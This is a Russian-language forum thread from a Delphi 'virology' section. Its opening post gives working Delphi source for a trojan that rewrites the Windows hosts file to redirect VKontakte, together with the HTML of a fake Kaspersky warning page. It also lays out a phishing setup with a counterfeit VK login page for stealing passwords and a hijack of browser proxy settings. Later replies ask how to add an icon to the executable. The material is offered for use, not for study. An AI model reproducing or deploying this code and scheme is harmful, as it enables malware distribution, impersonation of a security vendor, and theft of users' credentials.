Воскресенье, 07.03.2021, 10:59 Приветствую вас Гость | Группа "Гости" 
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx  
delphicode » Delphi » Вирусология Delphi » Trojan.Hosts Вводная статья (Учимся реализовать его!)
Trojan.Hosts Вводная статья
cool1Дата: Пятница, 12.11.2010, 13:20 | Сообщение # 1
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
В этой статье я раскажу вам простое использоваие этого троя!
Как вам известно он заражает ну модифицирует файл hosts в папке windows\system32\drivers\etc\hosts
Наш файл - hosts его можно открыть блокнотом wink
КОД ВИРУСА (модернизируйте сами)
Удалите форму и всуньте это:
Code
program Hosts;

uses
     Windows;

function WinDir:string;    
var p:PChar;
begin
GetMem(p, MAX_PATH);
result:='';
if GetWindowsDirectory(p, MAX_PATH)>0 then
result:=string(p);
FreeMem(p);
end;
var
    f:TextFile;
begin
AssignFile(f,WinDir+'\system32\drivers\etc\hosts');
Append(f);
Writeln(f,'127.0.0.1  vkontakte.ru');
Writeln(f,'127.0.0.1  www.vkontakte.ru');
Flush(f);
CloseFile(f);
end.

Все готово трой гатов распространите сами!

И так сначал настраиваем веб сервак ну вам нужен токо Apache ( http веб сервак)
Делаем редикрет напр сайта yandex.ru на 55.55.555.555/std
(55.55.555.555 Это типа ваш ip)
В папку std кидаем файл index.html
INDEX.HTML (CODE)

Code

<html>
<head>
  <meta http-equiv='content-type' content='text/html;charset=utf-8'>
  <title>Kaspersky Online Antivirus 2011</title>
  <style type="text/css">
html,body{height:100%}

body{width:100%;min-height:100%;margin:0;padding:0;color:#2C2C2C;font:normal 11px tahoma;background:#FFF}

form{margin:0}
table,input,select{font:normal 100% tahoma}
img{border:0;margin:0}
table{border-collapse:collapse}
a{color:#62707D}

.t,tr.t td{vertical-align:top}
.m{vertical-align:middle}
.b,tr.b td{vertical-align:bottom}
tr.t td td,tr.b td td{vertical-align:auto}
.l{text-align:left}
.c{text-align:center}
.r{text-align:right}

.nobr{white-space:nowrap}

.rel{position:rela tive}
.abs{position:absolute}
.fl{float:left}
.fr{float:right}
.cl{clear:both}

.w100{width:100%}
.h100{height:100%}

big,.big{font -size:125%}
small,.small{font-size:95%}
.micro{color:#DDD;font:normal 9px tahoma}

h1{font:bold 20px arial; margin:0}
h4{font:bold 12px arial; margin:0}
p{text-align:justify;line-height:1.3;margin:0 0 0.5em 0}

.z{border:1px solid red}

.h1px{height:1px;font-size:1px;line-height:1px}

ul{margin:6px 0 6px 20px;padding:0}
ul li{margin:3px 0}
  </style>
</head>
<body>
<table class="w100 h100">
  <tr>
   <td class="c m">
    <table style="margin:0 auto;border:solid 1px #560000">
     <tr>
      <td class="l" style="padding:1px">
       <div style="width:346px;background:#E33630">
        <div style="padding:3px">
         <div style="background:#BF0A0A;padding:8px;border:solid 1px #FFF;color:#FFF">
          <h4>Kaspersky Online Antivirus 2011</h4>
          <h1>Kaspersky Online Antivirus 2011</h1>
         </div>
         <div class="c" style="font:bold 13px arial;text-transform:uppercase;color:#FFF;padding:8px 0">Доступ запрещен!</div>
         <div style="background:#F7F7F7;padding:20px 28px 36px">
          Запрашиваемый URL-адрес не может быть предоставлен<br><br>
          <b>В запрашиваемом объекте по URL-адресу::</b><br><br>
          <a href="http://vkontakte.ru">http://vkontakte.ru</a><br><br>
          <b>Обнаружена угроза::</b><br>
          <br>объект заражен <b>Trojan.VK.Spamer</b><br>
         </div>
         <div style="background:#F7F7F7;padding:0 2px 2px">
          <div style="background:#E9E9E9;padding:12px 30px 14px">
                              <b>Для устранения вируса перейдите по ссылке:</b> <a href="http://vkontakte.ru><b>http://vkontakte.ru</b></a><br>
          </div>
         </div>
        </div>
       </div>
      </td>
     </tr>
    </table>
   </td>
  </tr>
</table>
</body>
</html>

Делаем редикрет сайтов типа virustotal google в эту папку biggrin
Потом нужен сам контакт!
создаем папку vk
качаем фэйк вк с инета! Можно тащить пасы ну тода на веб сервак надо ставить php труда нет! А мона отредактировать фэйк чтобы при отправки смс и воода паса вирь удалялся или давалась инструкция на удаление! Ну правдо пароли для сайта на JS не надежны так что придется ставить PHP!
УДАЧИ!
Прикрепления: HOSTS.dpr(0.4 Kb)



За помощь ставьте +!


Сообщение отредактировал cool1 - Пятница, 12.11.2010, 13:23
 
cool1Дата: Пятница, 12.11.2010, 13:21 | Сообщение # 2
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
А еще моно поработать с настройками браузера и в настройки прокси вписать свой IP biggrin :D biggrin


За помощь ставьте +!


Сообщение отредактировал cool1 - Пятница, 12.11.2010, 13:22
 
-Drayver-Дата: Среда, 02.03.2011, 19:56 | Сообщение # 3
Был не раз
Зарегистрирован: 01.03.2011
Группа: Пользователи
Сообщений: 10
Статус: Offline
А можно как то в добавыть иконку к нему?как?а то через делфи невозможно,так как формы нет....
 
dolphinДата: Среда, 02.03.2011, 20:20 | Сообщение # 4
Администратор
Сообщений: 906
Статус: Offline
Quote (-Drayver-)
А можно как то в добавить иконку к нему?как?а то через делфи невозможно,так как формы нет....

В ресурсах есть всегда стандартная, решается через
{$R *.res}
 
-Drayver-Дата: Среда, 02.03.2011, 21:31 | Сообщение # 5
Был не раз
Зарегистрирован: 01.03.2011
Группа: Пользователи
Сообщений: 10
Статус: Offline
Quote (dolphin)
В ресурсах есть всегда стандартная, решается через
{$R *.res}
- поподробнее можно? ,куда требуетса заходить чтобы изменить иконку??кстати можно добавыть иконку в exe'шник через Restorator 2007?
Я пока новичок,извините что много дурацких вопросов.Sorry za OFFtop/ biggrin
 
dolphinДата: Четверг, 03.03.2011, 16:56 | Сообщение # 6
Администратор
Сообщений: 906
Статус: Offline
Редактором рес файлов, там полюбому должна быть стандартная иконка.

Если вручную - читайте тут http://articles.org.ru/docum/resurs.php

 
-Drayver-Дата: Четверг, 03.03.2011, 19:34 | Сообщение # 7
Был не раз
Зарегистрирован: 01.03.2011
Группа: Пользователи
Сообщений: 10
Статус: Offline
Quote
Если вручную - читайте тут http://articles.org.ru/docum/resurs.php
- спасибо вам за ссылочку.
 
delphicode » Delphi » Вирусология Delphi » Trojan.Hosts Вводная статья (Учимся реализовать его!)
  • Страница 1 из 1
  • 1
Поиск:

delphicode.ru © 2008 - 2021 Хостинг от uCoz